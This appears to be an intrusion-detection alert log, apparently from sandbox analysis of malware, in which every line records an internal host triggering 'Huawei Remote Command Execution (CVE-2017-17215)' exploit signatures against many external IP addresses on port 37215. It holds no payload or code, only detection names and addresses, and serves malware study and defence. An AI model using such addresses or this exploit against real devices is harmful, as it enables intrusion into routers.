                                                    07/10/24-08:26:52.017294TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5033037215192.168.2.14197.22.177.116
                                                    07/10/24-08:27:23.881765TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4534237215192.168.2.14146.252.135.138
                                                    07/10/24-08:27:24.951941TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4799437215192.168.2.14197.22.46.123
                                                    07/10/24-08:26:57.576804TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4582637215192.168.2.14197.91.134.174
                                                    07/10/24-08:27:22.866153TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4435637215192.168.2.14197.170.102.116
                                                    07/10/24-08:27:24.959708TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5199837215192.168.2.1441.124.238.95
                                                    07/10/24-08:27:33.769630TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4484637215192.168.2.14198.109.60.141
                                                    07/10/24-08:27:14.882178TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5677637215192.168.2.14157.245.49.216
                                                    07/10/24-08:27:14.890246TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4184837215192.168.2.14157.9.128.155
                                                    07/10/24-08:26:29.875602TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3772437215192.168.2.14197.200.106.185
                                                    07/10/24-08:27:32.523426TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5266437215192.168.2.14197.68.31.40
                                                    07/10/24-08:26:23.328153TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5528637215192.168.2.14148.153.194.202
                                                    07/10/24-08:26:36.415426TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4513837215192.168.2.14157.75.195.168
                                                    07/10/24-08:26:28.926609TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5433237215192.168.2.14141.194.232.125
                                                    07/10/24-08:26:41.592931TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5046637215192.168.2.14109.103.189.134
                                                    07/10/24-08:26:25.420167TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5377837215192.168.2.14197.21.77.124
                                                    07/10/24-08:26:13.766150TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3429237215192.168.2.14157.87.82.194
                                                    07/10/24-08:26:57.680054TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4694037215192.168.2.14197.221.50.233
                                                    07/10/24-08:26:41.435544TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3804837215192.168.2.14197.145.212.201
                                                    07/10/24-08:27:19.317652TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5503237215192.168.2.14140.64.241.164
                                                    07/10/24-08:27:23.938620TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3455837215192.168.2.14157.95.83.13
                                                    07/10/24-08:27:32.491395TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3654837215192.168.2.14192.55.170.195
                                                    07/10/24-08:26:38.555542TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4022837215192.168.2.1441.110.133.171
                                                    07/10/24-08:27:27.159705TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4989837215192.168.2.1448.220.245.196
                                                    07/10/24-08:27:32.548178TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4806437215192.168.2.1441.146.102.53
                                                    07/10/24-08:26:28.795318TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4358637215192.168.2.14197.228.226.87
                                                    07/10/24-08:27:30.408951TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4747237215192.168.2.1469.163.153.218
                                                    07/10/24-08:26:34.245284TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4288437215192.168.2.14197.208.169.37
                                                    07/10/24-08:26:28.850354TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6096837215192.168.2.14157.86.247.66
                                                    07/10/24-08:26:51.997366TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3334437215192.168.2.14157.254.44.225
                                                    07/10/24-08:26:52.085060TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3369237215192.168.2.1441.2.155.142
                                                    07/10/24-08:26:42.164122TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4629637215192.168.2.14157.128.237.232
                                                    07/10/24-08:27:31.517899TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3929037215192.168.2.14223.72.206.168
                                                    07/10/24-08:26:26.441172TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5745037215192.168.2.14102.58.215.83
                                                    07/10/24-08:26:43.870902TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5129637215192.168.2.14197.44.34.87
                                                    07/10/24-08:26:36.415426TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3839437215192.168.2.1441.103.97.151
                                                    07/10/24-08:26:31.058542TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4834637215192.168.2.14157.62.106.221
                                                    07/10/24-08:26:33.213078TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5656237215192.168.2.14197.166.249.118
                                                    07/10/24-08:26:34.201390TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5815637215192.168.2.1441.137.82.198
                                                    07/10/24-08:27:23.904429TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3666637215192.168.2.14133.98.30.115
                                                    07/10/24-08:26:25.497037TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4630637215192.168.2.1441.178.220.168
                                                    07/10/24-08:27:08.334511TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3359437215192.168.2.14197.252.49.145
                                                    07/10/24-08:26:43.574269TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4772237215192.168.2.14157.115.204.246
                                                    07/10/24-08:26:11.659473TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5800237215192.168.2.14157.25.128.159
                                                    07/10/24-08:26:14.815685TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3287237215192.168.2.1427.109.189.153
                                                    07/10/24-08:27:03.000854TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5337237215192.168.2.14197.43.121.184
                                                    07/10/24-08:26:57.641843TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5502837215192.168.2.1476.27.29.133
                                                    07/10/24-08:27:07.369719TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5887237215192.168.2.14197.50.227.46
                                                    07/10/24-08:26:23.341408TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5564237215192.168.2.1445.112.206.101
                                                    07/10/24-08:26:43.651509TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4849637215192.168.2.1495.146.90.5
                                                    07/10/24-08:27:33.687075TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3520637215192.168.2.14153.66.101.74
                                                    07/10/24-08:26:22.282645TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5274837215192.168.2.14157.121.196.155
                                                    07/10/24-08:26:49.900161TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4747437215192.168.2.14197.130.220.214
                                                    07/10/24-08:26:25.443386TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3633637215192.168.2.148.48.251.123
                                                    07/10/24-08:26:34.216677TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6022037215192.168.2.14157.72.149.141
                                                    07/10/24-08:26:43.587984TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5322637215192.168.2.14197.250.82.147
                                                    07/10/24-08:26:38.638682TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5253237215192.168.2.14157.91.121.230
                                                    07/10/24-08:27:32.545820TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4180437215192.168.2.14102.222.107.240
                                                    07/10/24-08:26:17.971470TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5995637215192.168.2.1472.39.101.15
                                                    07/10/24-08:26:20.185610TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4141837215192.168.2.14141.47.29.235
                                                    07/10/24-08:26:34.202550TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5787637215192.168.2.1413.67.44.3
                                                    07/10/24-08:26:43.915899TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4301637215192.168.2.1461.33.208.236
                                                    07/10/24-08:27:13.808295TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4894837215192.168.2.1441.21.221.235
                                                    07/10/24-08:27:19.239106TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5982837215192.168.2.14163.213.108.254
                                                    07/10/24-08:26:34.239596TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4373837215192.168.2.14157.85.248.1
                                                    07/10/24-08:27:34.119507TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5584437215192.168.2.14197.217.64.68
                                                    07/10/24-08:27:33.761946TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5392437215192.168.2.14166.153.137.121
                                                    07/10/24-08:27:11.514897TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4565637215192.168.2.1441.187.235.88
                                                    07/10/24-08:27:27.160309TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3920837215192.168.2.14142.99.232.164
                                                    07/10/24-08:27:10.751291TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5811237215192.168.2.14197.145.17.136
                                                    07/10/24-08:27:23.898408TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4080637215192.168.2.1441.126.207.156
                                                    07/10/24-08:26:29.842120TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3787837215192.168.2.14197.107.246.114
                                                    07/10/24-08:27:02.906092TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4702637215192.168.2.1441.126.170.120
                                                    07/10/24-08:26:14.771474TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5852237215192.168.2.14157.212.17.96
                                                    07/10/24-08:26:31.110182TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4617837215192.168.2.14157.130.44.94
                                                    07/10/24-08:27:20.488786TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5397837215192.168.2.14157.166.1.63
                                                    07/10/24-08:26:22.260349TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5774037215192.168.2.1441.64.247.55
                                                    07/10/24-08:26:36.337218TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3322637215192.168.2.1461.194.235.56
                                                    07/10/24-08:26:48.012931TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3992237215192.168.2.1441.17.12.120
                                                    07/10/24-08:27:05.121517TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4765237215192.168.2.14197.3.186.95
                                                    07/10/24-08:27:02.986988TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5635037215192.168.2.14157.163.169.251
                                                    07/10/24-08:27:19.312425TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3871237215192.168.2.14197.198.81.70
                                                    07/10/24-08:26:43.778762TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5663837215192.168.2.1441.36.72.240
                                                    07/10/24-08:27:05.210866TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5864037215192.168.2.1441.62.117.246
                                                    07/10/24-08:27:24.932186TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4186637215192.168.2.1441.124.157.82
                                                    07/10/24-08:26:29.875602TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4692637215192.168.2.14197.236.224.22
                                                    07/10/24-08:26:59.640605TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3829637215192.168.2.14197.137.226.40
                                                    07/10/24-08:26:13.824276TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6008437215192.168.2.14157.20.113.153
                                                    07/10/24-08:26:18.016670TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4734637215192.168.2.1441.91.123.19
                                                    07/10/24-08:27:11.551347TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4243837215192.168.2.14194.232.221.104
                                                    07/10/24-08:27:19.261102TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4984437215192.168.2.1457.9.97.144
                                                    07/10/24-08:27:19.289200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4290837215192.168.2.14157.142.247.1
                                                    07/10/24-08:26:57.528715TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4638237215192.168.2.14139.102.139.251
                                                    07/10/24-08:26:26.591213TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5060037215192.168.2.14197.131.78.88
                                                    07/10/24-08:26:43.570242TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4032637215192.168.2.14157.26.31.91
                                                    07/10/24-08:26:15.856531TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4419837215192.168.2.14157.151.205.236
                                                    07/10/24-08:26:29.880668TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3891037215192.168.2.1441.250.160.185
                                                    07/10/24-08:26:43.718620TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4246637215192.168.2.14197.75.186.20
                                                    07/10/24-08:27:10.625884TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4841837215192.168.2.14157.151.178.216
                                                    07/10/24-08:26:48.016276TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4668037215192.168.2.14197.191.123.72
                                                    07/10/24-08:27:27.147425TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4298437215192.168.2.14122.155.134.109
                                                    07/10/24-08:26:14.721683TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4603237215192.168.2.14157.1.167.208
                                                    07/10/24-08:27:22.564060TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3550437215192.168.2.14157.241.137.68
                                                    07/10/24-08:27:07.384932TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4932237215192.168.2.14157.31.253.248
                                                    07/10/24-08:26:33.247201TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5492837215192.168.2.14197.132.70.25
                                                    07/10/24-08:27:20.494358TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5613237215192.168.2.14197.219.104.221
                                                    07/10/24-08:26:53.145999TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3389037215192.168.2.14197.140.246.167
                                                    07/10/24-08:26:23.356000TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5098437215192.168.2.1441.215.174.146
                                                    07/10/24-08:26:49.768193TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3936437215192.168.2.14111.159.108.143
                                                    07/10/24-08:26:25.492137TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3592237215192.168.2.14197.125.99.45
                                                    07/10/24-08:27:19.193272TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4796037215192.168.2.14157.195.162.201
                                                    07/10/24-08:27:30.444782TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3988637215192.168.2.1489.200.207.163
                                                    07/10/24-08:27:30.510690TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4736437215192.168.2.14144.117.74.241
                                                    07/10/24-08:27:30.538124TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5177637215192.168.2.1441.52.136.73
                                                    07/10/24-08:27:19.271006TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5952037215192.168.2.1441.120.91.246
                                                    07/10/24-08:26:15.844473TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5443837215192.168.2.14157.74.21.91
                                                    07/10/24-08:26:49.866134TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3951437215192.168.2.14157.151.103.10
                                                    07/10/24-08:27:14.878882TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4156437215192.168.2.1441.232.129.177
                                                    07/10/24-08:27:32.526946TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4696237215192.168.2.14157.104.52.53
                                                    07/10/24-08:27:11.574259TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3833237215192.168.2.14197.67.35.3
                                                    07/10/24-08:27:19.228026TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5165637215192.168.2.14197.161.174.117
                                                    07/10/24-08:26:57.669617TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5969037215192.168.2.1441.88.79.199
                                                    07/10/24-08:26:49.898002TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5753637215192.168.2.14186.55.100.100
                                                    07/10/24-08:26:41.630193TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5206837215192.168.2.14158.237.151.45
                                                    07/10/24-08:27:05.121354TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4065237215192.168.2.1470.7.110.129
                                                    07/10/24-08:27:02.823206TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4259037215192.168.2.14197.70.68.139
                                                    07/10/24-08:26:55.377944TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5631237215192.168.2.14174.201.15.137
                                                    07/10/24-08:27:33.941322TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4441437215192.168.2.14157.64.158.248
                                                    07/10/24-08:26:18.001692TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5665437215192.168.2.1441.210.199.97
                                                    07/10/24-08:26:43.626199TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5442837215192.168.2.14197.153.91.109
                                                    07/10/24-08:27:08.399018TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4863837215192.168.2.1441.240.155.134
                                                    07/10/24-08:26:59.753614TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5503637215192.168.2.14157.225.52.103
                                                    07/10/24-08:27:05.097626TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4831837215192.168.2.14183.221.146.173
                                                    07/10/24-08:26:33.237897TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5755237215192.168.2.14157.206.190.175
                                                    07/10/24-08:26:13.831960TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4073237215192.168.2.14157.171.136.29
                                                    07/10/24-08:26:43.636753TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5063437215192.168.2.1441.167.39.230
                                                    07/10/24-08:26:38.567555TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3281837215192.168.2.14197.66.89.239
                                                    07/10/24-08:27:33.854802TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5287237215192.168.2.14212.78.139.248
                                                    07/10/24-08:26:33.237897TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4012437215192.168.2.1441.60.4.129
                                                    07/10/24-08:27:11.547774TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5602437215192.168.2.14157.177.141.204
                                                    07/10/24-08:27:24.903718TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3693037215192.168.2.14197.128.219.229
                                                    07/10/24-08:26:15.856531TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4201037215192.168.2.14156.97.59.168
                                                    07/10/24-08:27:19.208740TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5952437215192.168.2.1441.236.85.241
                                                    07/10/24-08:27:27.108447TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4741037215192.168.2.14197.194.152.223
                                                    07/10/24-08:26:48.002898TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5416437215192.168.2.14157.104.76.89
                                                    07/10/24-08:26:59.797297TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5415637215192.168.2.14197.148.161.88
                                                    07/10/24-08:27:02.740584TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4556037215192.168.2.14157.146.100.182
                                                    07/10/24-08:27:05.230730TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3349237215192.168.2.14197.145.14.72
                                                    07/10/24-08:26:14.814365TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5486637215192.168.2.14197.44.135.217
                                                    07/10/24-08:27:16.979192TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4330437215192.168.2.1458.130.202.103
                                                    07/10/24-08:26:13.758860TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5058837215192.168.2.14157.161.174.38
                                                    07/10/24-08:26:55.330148TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3896237215192.168.2.14157.83.24.70
                                                    07/10/24-08:26:15.812623TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5880837215192.168.2.14197.112.212.51
                                                    07/10/24-08:26:20.116732TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4432037215192.168.2.1441.252.106.156
                                                    07/10/24-08:27:22.844415TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3301037215192.168.2.14169.48.143.21
                                                    07/10/24-08:26:23.351340TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4631037215192.168.2.14157.42.138.224
                                                    07/10/24-08:27:30.505029TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4721037215192.168.2.14197.199.18.59
                                                    07/10/24-08:26:14.816754TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5573037215192.168.2.1450.190.53.50
                                                    07/10/24-08:26:14.755874TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3834837215192.168.2.14157.192.152.92
                                                    07/10/24-08:27:10.772266TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4824437215192.168.2.14157.55.182.75
                                                    07/10/24-08:26:15.803828TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4002437215192.168.2.14197.158.129.74
                                                    07/10/24-08:26:43.638396TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5490437215192.168.2.14157.21.165.237
                                                    07/10/24-08:26:57.619989TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3338437215192.168.2.1474.99.137.247
                                                    07/10/24-08:27:22.870482TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3309237215192.168.2.14157.133.25.85
                                                    07/10/24-08:26:15.849437TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4006837215192.168.2.14131.42.124.25
                                                    07/10/24-08:26:53.189669TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6026237215192.168.2.14181.253.148.11
                                                    07/10/24-08:27:07.342964TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4530037215192.168.2.1441.120.139.253
                                                    07/10/24-08:27:20.484132TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4019037215192.168.2.1441.104.57.172
                                                    07/10/24-08:26:55.376308TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3485237215192.168.2.14157.94.101.134
                                                    07/10/24-08:27:24.976996TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3366237215192.168.2.1441.73.65.14
                                                    07/10/24-08:26:52.018134TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3625237215192.168.2.14157.222.23.227
                                                    07/10/24-08:27:07.364210TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3312437215192.168.2.14157.190.56.56
                                                    07/10/24-08:27:27.148686TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3362637215192.168.2.1441.142.60.40
                                                    07/10/24-08:26:28.845245TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4765037215192.168.2.14205.214.167.99
                                                    07/10/24-08:26:57.650012TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3886237215192.168.2.1441.218.111.130
                                                    07/10/24-08:27:02.830605TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3721037215192.168.2.1441.26.237.252
                                                    07/10/24-08:27:22.492179TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4736037215192.168.2.14197.165.222.181
                                                    07/10/24-08:27:30.525372TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5983837215192.168.2.14157.179.55.147
                                                    07/10/24-08:26:17.997409TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5966437215192.168.2.145.202.215.170
                                                    07/10/24-08:26:43.922168TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4019837215192.168.2.14186.85.164.255
                                                    07/10/24-08:26:15.881415TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4509437215192.168.2.14197.59.119.49
                                                    07/10/24-08:26:48.000164TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5913037215192.168.2.14197.153.80.166
                                                    07/10/24-08:26:20.192281TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3884837215192.168.2.1441.107.194.44
                                                    07/10/24-08:26:41.494143TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3421237215192.168.2.1458.98.216.189
                                                    07/10/24-08:27:27.155476TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5080837215192.168.2.14197.59.60.30
                                                    07/10/24-08:26:17.981782TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3359837215192.168.2.1441.29.100.92
